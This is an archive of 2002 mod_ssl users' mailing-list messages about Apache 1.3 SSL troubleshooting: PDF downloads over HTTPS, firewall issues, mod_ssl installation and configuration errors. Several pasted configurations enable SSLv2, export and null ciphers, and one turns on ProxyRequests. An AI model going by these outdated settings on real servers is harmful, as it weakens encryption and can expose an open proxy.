User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct  7 11:53:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA04274; Mon, 7 Oct 2002 11:52:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from vkhdsu24.hda.hydro.com id LAA04268; Mon, 7 Oct 2002 11:52:10 +0200 (MET DST)
Received: from y3102220 (y3102220.hda.hydro.com [136.164.10.226])
	by vkhdsu24.hda.hydro.com (8.9.1a/8.9.1) with SMTP id LAA04297
	for ; Mon, 7 Oct 2002 11:52:08 +0200 (MET DST)
Message-ID: <00bc01c26de7$331d0cd0$e20aa488@hda.hydro.com>
From: "Jens-Harald Johansen" 
To: 
Subject: Apache-1.3.26 w/mod_proxy and mod_ssl-2.8.10 problems
Date: Mon, 7 Oct 2002 11:52:07 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jens-Harald Johansen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Names have been changed to protect the innocent.

Running on SunOS 5.8 Generic_108528-16 sun4u sparc SUNW,Ultra-250


I'm having problems with a PDF file which has a size of 1.4MB which I'm trying
to view over a SSL connection.

When viewing the page with IE 5.5 I can't use the "Open file from its current
location" option but I'm forced to use the "Save this file to disk" instead.
When pressing OK it pops up with an error message like "not able to open this
intranet site".

When trying to view the same page in Netscape 4.7 it immediatly opens part of
the PDF as an object. The problem here is that it looks like it only gets a
part of the document before disconnecting.

When I do the same with Opera ... lo and behold ... it works. Forgot to mention
that when I shift-click in netscape it downloads the file without any problems.

Here's a small part of the ssl_engine_log which pops up when I try the IE
approach:

[03/Oct/2002 14:50:42 11648] [info]  Connection to child 4 established (server
apache.duh.com:443, client 192.168.10.10)
[03/Oct/2002 14:50:42 11648] [info]  Seeding PRNG with 1160 bytes of entropy
[03/Oct/2002 14:50:44 11648] [info]  Connection: Client IP: 192.168.10.10,
Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)
[03/Oct/2002 14:50:44 11648] [info]  Initial (No.1) HTTPS request received for
child 4 (server apache.duh.com:443)
[03/Oct/2002 14:50:51 11648] [info]  Connection to child 4 closed with standard
shutdown (server apache.duh.com:443, client 192.168.10.10)

And from the same log when I try it through Netscape:

[03/Oct/2002 15:07:47 11733] [info]  Connection to child 3 established (server
apache.duh.com:443, client 192.168.10.10)
[03/Oct/2002 15:07:47 11733] [info]  Seeding PRNG with 1160 bytes of entropy
[03/Oct/2002 15:07:48 11733] [info]  Connection: Client IP: 192.168.10.10,
Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)
[03/Oct/2002 15:07:48 11733] [info]  Initial (No.1) HTTPS request received for
child 3 (server apache.duh.com:443)
[03/Oct/2002 15:07:48 11734] [info]  Connection to child 4 established (server
apache.duh.com:443, client 192.168.10.10)
[03/Oct/2002 15:07:48 11734] [info]  Seeding PRNG with 1160 bytes of entropy
[03/Oct/2002 15:07:48 11733] [info]  Connection to child 3 closed with standard
shutdown (server apache.duh.com:443, client 192.168.10.10)
[03/Oct/2002 15:07:48 11734] [info]  Connection: Client IP: 192.168.10.10,
Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)
[03/Oct/2002 15:07:48 11734] [info]  Initial (No.1) HTTPS request received for
child 4 (server apache.duh.com:443)
[03/Oct/2002 15:07:49 11734] [info]  Connection to child 4 closed with standard
shutdown (server apache.duh.com:443, client 192.168.10.10)

And finally, when I use Opera:

[07/Oct/2002 11:39:40 13859] [info]  Connection to child 5 established (server
apache.duh.com:443, client 192.168.10.10)
[07/Oct/2002 11:39:40 13859] [info]  Seeding PRNG with 1160 bytes of entropy
[07/Oct/2002 11:39:40 13859] [info]  Connection: Client IP: 192.168.10.10,
Protocol: TLSv1, Cipher: RC4-SHA (128/128 bits)
[07/Oct/2002 11:39:40 13859] [info]  Initial (No.1) HTTPS request received for
child 5 (server apache.duh.com:443)
[07/Oct/2002 11:39:42 13859] [info]  Connection to child 5 closed with standard
shutdown (server apache.duh.com:443, client 192.168.10.10)


As mentioned Apache has been compiled with mod_ssl and we're using
OpenSSL lib 0.9.6g. Configure string looks like this:

./configure --with-apache=../httpd-1.3.26

for mod_ssl and Apache:

SSL_BASE=/opt/SMCossl
./configure --prefix=/local/apache-1.3.26 --enable-module=proxy --enable-module
=so --enable-module=ssl --enable-module=rewrite --enable-module=info


Here's a small portion of the httpd.config:


 Listen 80
 Listen 443



 AddType application/x-x509-ca-cert .crt
 AddType application/x-pkcs7-crl    .crl



 ProxyRequests   On
 ProxyPass   /DUH/ http://apache-1.duh.com/
 ProxyPassReverse  /DUH/ http://apache-1.duh.com/
 ProxyPass   /bil/ http://apache-1.duh.com/bil/



 SSLPassPhraseDialog   builtin
 SSLSessionCache         dbm:/local/apache-1.3.26/logs/ssl_scache
 SSLSessionCacheTimeout  300
 SSLMutex    file:/local/apache-1.3.26/logs/ssl_mutex
 SSLRandomSeed   startup builtin
 SSLRandomSeed   connect builtin
 SSLLog        /local/apache-1.3.26/logs/ssl_engine_log
 SSLLogLevel   trace



 
  DocumentRoot "/local/apache-1.3.26/htdocs"
  ServerName apache.duh.com
  ServerAdmin root@apache.duh.com
  ErrorLog /local/apache-1.3.26/logs/error_log
  TransferLog /local/apache-1.3.26/logs/access_log
  SSLEngine on
  SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
  SSLCertificateFile /local/apache-1.3.26/conf/ssl.crt/server.cert
  SSLCertificateKeyFile /local/apache-1.3.26/conf/ssl.key/server.key
  SSLVerifyClient none
  SSLVerifyDepth  5
  
   SSLOptions +StdEnvVars
  

  
   SSLOptions +StdEnvVars
  

  SetEnvIf User-Agent ".*MSIE.*" \
   nokeepalive ssl-unclean-shutdown \
   downgrade-1.0 force-response-1.0

  CustomLog /local/apache-1.3.26/logs/ssl_request_log \
   "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
 


Anything else which is needed here ?


Now, I've tried to find solutions to this here problem for some time now.
I've RTFM, I've read the FAQ, I've read miscellaneous postings here and there
outlining possible solutions to this problem (I guess its not just related to
PDF files??) and I've tried to add a few settings here and there to the config
without any success.

When I'm using the HTTP instead of HTTPS I have no trouble at all getting the
document from any browser so my thoughts is that it is mod_ssl which is the
problem (or browsers).


Anyone ?



Regards

Jens-Harald Johansen

The wisest man I ever knew taught me something I never forgot.
Although I never forgot it, I never quite memorized it, either.
So what I am left with is the memory of having learned something very wise that
I can't quite remember.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct  7 11:56:58 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA04387; Mon, 7 Oct 2002 11:55:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id LAA04370; Mon, 7 Oct 2002 11:54:36 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g979rws10440
	for ; Mon, 7 Oct 2002 10:54:20 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id <4FXK1RLM>; Mon, 7 Oct 2002 10:53:53 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F2162@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: SSL Not Working from Outside LAN
Date: Mon, 7 Oct 2002 10:53:48 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Have you also ran "ipchains -L" to see what you get? You may well have set
up a firewall that prevents packets coming in.

If you get this: "ipchains: Incompatible with this kernel", then you don't
have a firewall on the server. If you get anything else, it could be
stopping packets coming in.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Theories of evolution are like buses - there'll be another one along in a
minute


> -----Original Message-----
> From: Jeff Umstead [mailto:jumstead@merritech.com]
> Sent: 06 October 2002 16:03
> To: modssl-users@modssl.org
> Subject: Re: SSL Not Working from Outside LAN
> 
> 
> Good idea!  I'll have to wait until tomorrow to try that.  
> 
> I did however do some packet sniffing and noticed that tcp packets 
> from outside the firewall do get to the web server and the web 
> server returns tcp packets.  But never returns any SSL ( actually 
> SSLv2 protocol I think) packets.  Watching the packets for http the 
> tcp and http packets pass back and forth.
> 
> Thanks
> --
> Jeff Umstead
> IS Director
> Merrill Tool Holding Company
> Saginaw MI USA
> 
> 
> On 6 Oct 2002 at 10:10, Jeffrey Burgoyne wrote:
> 
> > 
> > How about a simple test to ensure it is not the firewall. Set apache
> > to listen to HTTPS across port 80, which you already know works
> > outside the firewall. Then you can easily test to ensure it is not 
> the
> > firewall.
> > 
> > Jeff
> > 
> > 
> > On Sun, 6 Oct 2002, Jeff Umstead wrote:
> > 
> > > I've recently added a Red Hat 7.3 Linux server to our network
> > > running Apache and mod_ssl.  My problem is I can't make an 
> https
> > > (over standard port 443) connection from outside our network.  
> I can
> > > connect via http (port 80) from both inside and outside our LAN.  
> > > 
> > > I have the necessary port pass throughs, firewall rules etc in 
> place
> > > for both ports.  It works perfectly from inside our lan 
> (subnet) to
> > > either http or https but not from our other sites (different
> > > subnets) or from the internet.
> > > 
> > > I believe the problem is either an incorrect setting in httpd.conf
> > > or perhaps in a network configuration file I've overlooked.  Or 
> ???
> > > 
> > > Any help / tips  would be greatly appreciated.
> > > 
> 
> 
> 
> This e-mail (and attachment(s)) has been virus scanned by
> McAfee WebShield.
> 
> This message is intended only for use of the individual or
> entity to whom it is addressed, and may contain information
> that is privileged, confidential and exempt from disclosure
> under applicable law.  If the reader of this message is not
> the intended recipient, or the employee or agent
> responsible for delivering the message to the intended
> recipient, you are hereby notified that any unauthorized
> use, dissemination, distribution or copying of this e-mail
> or attachments, in whole or in part is strictly prohibited
> and may be unlawful.  If you have received this message in
> error, please inform the sender by replying to this message
> and then delete the message and any attachments from your
> system and destroy all copies. Thank You
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct  7 12:10:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA04765; Mon, 7 Oct 2002 12:09:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id MAA04759; Mon, 7 Oct 2002 12:08:30 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g97A88s11310
	for ; Mon, 7 Oct 2002 11:08:14 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id <4FXK1RSV>; Mon, 7 Oct 2002 11:08:03 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F2163@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: Installing mod_ssl
Date: Mon, 7 Oct 2002 11:08:00 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

You actually have several options:

1. Use the mod_ssl, mm and apache package that come with the Red Hat Linux
7.3 system. These are out of date, but you can get the latest by registering
with https://rhn.redhat.com. Some people don't like the fact that these are
not the latest versions, merely "backported" to the latest fix. It doesn't
bother me though. The latest openssl update from Red Hat prevents the "linux
slapper" worm from infecting your systems.

2. Remove the apache, mm and mod_ssl rpm packages and recompiling them.

In the second case, you have two options:

1. Compile against the openssl that comes with 7.3. In this case you'll need
to install the openssl-devel rpm package.
2. Compile against the latest openssl files. In that case I believe you'd
need to install the openssl binary into a directory other than /usr/bin (see
http://www.openssl.org/support/faq.cgi#BUILD8). If I'm wrong on this
hopefully someone will correct me, but I've always believed that you need
the same version of openssl installed somewhere that you used to compile
mod_ssl.

There is always the option of creating RPMs from either of the above
options.

Don't remove the openssl package that comes with 7.3 though. You'll break
several packages that come with 7.3 such as ssh, sendmail and nearly all the
email programs.

I used to compile apache and mod_ssl, but now I prefer to wait for the
packages from Red Hat.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Theories of evolution are like buses - there'll be another one along in a
minute


> -----Original Message-----
> From: Dan Sabo [mailto:dan@dansabo.net]
> Sent: 07 October 2002 00:31
> To: modssl-users@modssl.org
> Subject: Installing mod_ssl
> 
> 
> Hi Folks,
> 
> mod_ssl newbie here.  I'm running RH Linux 7.3 and apache 
> 1.3.23.  I have
> been reading the archives and Kabir's book - "Red Hat Linux 7 
> Server", and
> from what I understand, correct me if I'm wrong, is that in 
> order to install
> mod_ssl on my machine, I will have to start from scratch and 
> re install and
> compile a fresh copy of apache.  Is this true?  Or can I 
> install mod_ssl on
> an existing apache machine that has already been configured 
> and set up with
> e-commerce sites?
> 
> If I can install mod_ssl on my machine without re compiling 
> apache, can
> anyone direct me to any step by step documentation as to how 
> to install and
> configure mod_ssl and secure sites/Thawte certificates on a 
> Linux 7.x box
> already set up with apache?
> 
> Lastly, if it is possible to install mod_ssl on a server 
> already configured
> with apache with e-commerce sites already set up, are there 
> any security
> risks in installing mod_ssl on an already configured server?  Is it
> "better", to install mod_ssl on an empty server?  Also I read 
> somewhere that
> this mod_ssl worm is a big problem.  Is that true?  Should I 
> upgrade my
> apache software to prevent such an attack, and if I do, will upgrading
> apache cause any problems with my current set up of my sites?
> 
> Thanks much
> 
> Dan Sabo
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct  7 15:32:57 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA10557; Mon, 7 Oct 2002 15:31:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from vkhdsu24.hda.hydro.com id PAA10547; Mon, 7 Oct 2002 15:30:45 +0200 (MET DST)
Received: from y3102220 (y3102220.hda.hydro.com [136.164.10.226])
	by vkhdsu24.hda.hydro.com (8.9.1a/8.9.1) with SMTP id PAA20392
	for ; Mon, 7 Oct 2002 15:30:38 +0200 (MET DST)
Message-ID: <013f01c26e05$b9687e00$e20aa488@hda.hydro.com>
From: "Jens-Harald Johansen" 
To: 
References: <00bc01c26de7$331d0cd0$e20aa488@hda.hydro.com>
Subject: Re: Apache-1.3.26 w/mod_proxy and mod_ssl-2.8.10 problems
Date: Mon, 7 Oct 2002 15:30:37 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jens-Harald Johansen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Duh ...


I found the answer here though:
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q316431

Which basically says that I need to disable the "Pragma: no-cache" Apache sends
by default

CacheNegotiatedDocs



jens:H

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct  7 15:36:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA10723; Mon, 7 Oct 2002 15:35:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from imo-m07.mx.aol.com id PAA10718; Mon, 7 Oct 2002 15:34:45 +0200 (MET DST)
From: camccuk@netscape.net
Received: from camccuk@netscape.net
	by imo-m07.mx.aol.com (mail_out_v34.13.) id m.10b.4954b2b (16226)
	 for ; Mon, 7 Oct 2002 09:34:33 -0400 (EDT)
Received: from  netscape.net (mow-m22.webmail.aol.com [64.12.180.138]) by air-in02.mx.aol.com (v89.10) with ESMTP id MAILININ22-1007093433; Mon, 07 Oct 2002 09:34:33 -0400
Date: Mon, 07 Oct 2002 09:36:53 -0400
To: modssl-users@modssl.org
Subject: RE: Installing mod_ssl
Message-ID: <71757916.6B542F7F.001D8163@netscape.net>
X-Mailer: Atlas Mailer 2.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: camccuk@netscape.net
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

>1. Use the mod_ssl, mm and apache package that come with the Red Hat Linux
>7.3 system. These are out of date, but you can get the latest by registering
>with https://rhn.redhat.com. Some people don't like the fact that these are
>not the latest versions, merely "backported" to the latest fix. It doesn't
>bother me though. The latest openssl update from Red Hat prevents the "linux
>slapper" worm from infecting your systems.

I've been doing this to keep my 6.2 packages up to date. I always find it a little bit disconcerting that openssl version returns a really old rev (0.9.5a in the backported rpm that I installed lasy week). Anyone know why RH insist on this confusing system? Why not just rebuild them in full for 6.2 and the other supported releases?

cam
-----------------------------------------
camccuk@netscape.net

__________________________________________________________________
The NEW Netscape 7.0 browser is now available. Upgrade now! http://channels.netscape.com/ns/browsers/download.jsp 

Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct  7 15:41:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA10879; Mon, 7 Oct 2002 15:40:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fsjrez04.irr.rl.af.mil id PAA10850; Mon, 7 Oct 2002 15:39:06 +0200 (MET DST)
Received: by FSJREZ04.irr.rl.af.mil with Internet Mail Service (5.5.2653.19)
	id <4GX0QF2H>; Mon, 7 Oct 2002 13:39:01 -0000
Message-ID: 
From: Zandi Patrick S TSgt AFRL/IFOSS 
To: "'modssl-users@modssl.org'" 
Subject: SSLCipherSuite ALL   error
Date: Mon, 7 Oct 2002 13:38:54 -0000 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Zandi Patrick S TSgt AFRL/IFOSS 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello , again.. I hate to be a pain here
With ./apachectl startssl 
I am getting......
"../conf/httpd.conf" 1234 lines, 44355 characters 
109 /apache/bin > ./apachectl startssl
Syntax error on line 1085 of /apache/conf/httpd.conf:
Invalid command 'SSLCipherSuite', perhaps mis-spelled or defined by a module
not included in the server configuration
./apachectl startssl: httpd could not be started

////Line 1085  says ///
1085  SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+SSLv2:+EXP:+eNULL
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct  7 15:49:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA11104; Mon, 7 Oct 2002 15:48:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fsjrez04.irr.rl.af.mil id PAA11087; Mon, 7 Oct 2002 15:47:30 +0200 (MET DST)
Received: by FSJREZ04.irr.rl.af.mil with Internet Mail Service (5.5.2653.19)
	id <4GX0QFKW>; Mon, 7 Oct 2002 13:47:24 -0000
Message-ID: 
From: Zandi Patrick S TSgt AFRL/IFOSS 
To: "'modssl-users@modssl.org'" 
Subject: Mod.so errors.
Date: Mon, 7 Oct 2002 13:47:19 -0000 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Zandi Patrick S TSgt AFRL/IFOSS 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello ,
I cannot get mod.so to work.. And I have no Idea where it should be here..
 
I build apache with the following options.. 
EAPI_MM="/usr/local/bin" \
SSL_BASE="/usr/local/ssl" \
./configure \
"--with-layout=Apache" \
"--server-uid=zandip" \
"--server-gid=other" \
"--with-perl=/usr/local/bin/perl" \
"--prefix=/apache" \
"--enable-module=most" \
"--enable-shared=max" \
"--enable-module=ssl" \
"--disable-rule=SSL_COMPAT" \
"--enable-rule=SSL_SDBM" \
"--enable-module=so" \
"--enable-module=rewrite" \
"--enable-module=log_referer" \
"--enable-module=log_agent" \
"--enable-module=expires" \
"--enable-module=info" \
"--enable-module=usertrack" \

Now When I execute I am getting the following..

Syntax error on line 204 of /apache/conf/httpd.conf:
Cannot load /apache/libexec/mod.so into server: ld.so.1: /apache/bin/httpd:
fatal: /apache/libexec/mod.so: open failed: No such file or directory
./apachectl start: httpd could not be started

Looking at line 204 says
LoadModule       mod_so  libexec/mod.so

Ls -la of LIBEXEC Shows..
httpd.exp           mod_asis.so         mod_cgi.so          mod_headers.so
mod_log_referer.so  mod_speling.so
libproxy.so         mod_auth.so         mod_define.so       mod_imap.so
mod_mime.so         mod_status.so
libssl.so           mod_auth_anon.so    mod_digest.so       mod_include.so
mod_mime_magic.so   mod_unique_id.so
mod_access.so       mod_auth_dbm.so     mod_dir.so          mod_info.so
mod_negotiation.so  mod_userdir.so
mod_actions.so      mod_autoindex.so    mod_env.so          mod_log_agent.so
mod_rewrite.so      mod_usertrack.so
mod_alias.so        mod_cern_meta.so    mod_expires.so
mod_log_config.so   mod_setenvif.so     mod_vhost_alias.so
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct  7 15:56:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA11271; Mon, 7 Oct 2002 15:55:53 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tcen-ul-mailsv00.telkom.co.za id PAA11254; Mon, 7 Oct 2002 15:54:12 +0200 (MET DST)
Received: from CNTRRA20-GTW01.telkom.co.za (CNTRRA20-GTW01.telkom.co.za [165.143.130.156])
	by tcen-ul-mailsv00.telkom.co.za (8.11.2/8.11.2/2002061301) with SMTP id g97Drva11934
	for ; Mon, 7 Oct 2002 15:53:59 +0200
Received: FROM CNTRRA20-XS00.telkom.co.za BY CNTRRA20-GTW01.telkom.co.za ; Mon Oct 07 15:53:57 2002 +0200
Received: from CNTRRA20-XS11.telkom.co.za ([165.143.131.216]) by CNTRRA20-XS00.telkom.co.za with Microsoft SMTPSVC(5.0.2195.5329);
	 Mon, 7 Oct 2002 15:53:57 +0200
Received: from TYGRRA01-XS11.telkom.co.za ([165.148.21.97]) by CNTRRA20-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.5329);
	 Mon, 7 Oct 2002 15:53:57 +0200
Received: from TYGRRA01-XCS00.telkom.co.za ([165.148.21.86]) by TYGRRA01-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.5329);
	 Mon, 7 Oct 2002 15:53:56 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: Mod.so errors.
Date: Mon, 7 Oct 2002 15:53:56 +0200
Message-ID: 
Thread-Topic: Mod.so errors.
Thread-Index: AcJuCHbyfA3M3KqvRYi+cMZN+0Jn6gAAG3HQ
From: "Jose Correia (J)" 
To: 
X-OriginalArrivalTime: 07 Oct 2002 13:53:56.0896 (UTC) FILETIME=[FAF52A00:01C26E08]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id PAA11259
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jose Correia (J)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

You have to obtain the mod.so file and place it in the ../libexec
directory.. its not there.


-----Original Message-----
From: Zandi Patrick S TSgt AFRL/IFOSS [mailto:Patrick.Zandi@rl.af.mil]
Sent: 07 October 2002 15:47
To: 'modssl-users@modssl.org'
Subject: Mod.so errors.


Hello ,
I cannot get mod.so to work.. And I have no Idea where it should be
here..
 
I build apache with the following options.. 
EAPI_MM="/usr/local/bin" \
SSL_BASE="/usr/local/ssl" \
./configure \
"--with-layout=Apache" \
"--server-uid=zandip" \
"--server-gid=other" \
"--with-perl=/usr/local/bin/perl" \
"--prefix=/apache" \
"--enable-module=most" \
"--enable-shared=max" \
"--enable-module=ssl" \
"--disable-rule=SSL_COMPAT" \
"--enable-rule=SSL_SDBM" \
"--enable-module=so" \
"--enable-module=rewrite" \
"--enable-module=log_referer" \
"--enable-module=log_agent" \
"--enable-module=expires" \
"--enable-module=info" \
"--enable-module=usertrack" \

Now When I execute I am getting the following..

Syntax error on line 204 of /apache/conf/httpd.conf:
Cannot load /apache/libexec/mod.so into server: ld.so.1:
/apache/bin/httpd:
fatal: /apache/libexec/mod.so: open failed: No such file or directory
./apachectl start: httpd could not be started

Looking at line 204 says
LoadModule       mod_so  libexec/mod.so

Ls -la of LIBEXEC Shows..
httpd.exp           mod_asis.so         mod_cgi.so
mod_headers.so
mod_log_referer.so  mod_speling.so
libproxy.so         mod_auth.so         mod_define.so
mod_imap.so
mod_mime.so         mod_status.so
libssl.so           mod_auth_anon.so    mod_digest.so
mod_include.so
mod_mime_magic.so   mod_unique_id.so
mod_access.so       mod_auth_dbm.so     mod_dir.so
mod_info.so
mod_negotiation.so  mod_userdir.so
mod_actions.so      mod_autoindex.so    mod_env.so
mod_log_agent.so
mod_rewrite.so      mod_usertrack.so
mod_alias.so        mod_cern_meta.so    mod_expires.so
mod_log_config.so   mod_setenvif.so     mod_vhost_alias.so
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
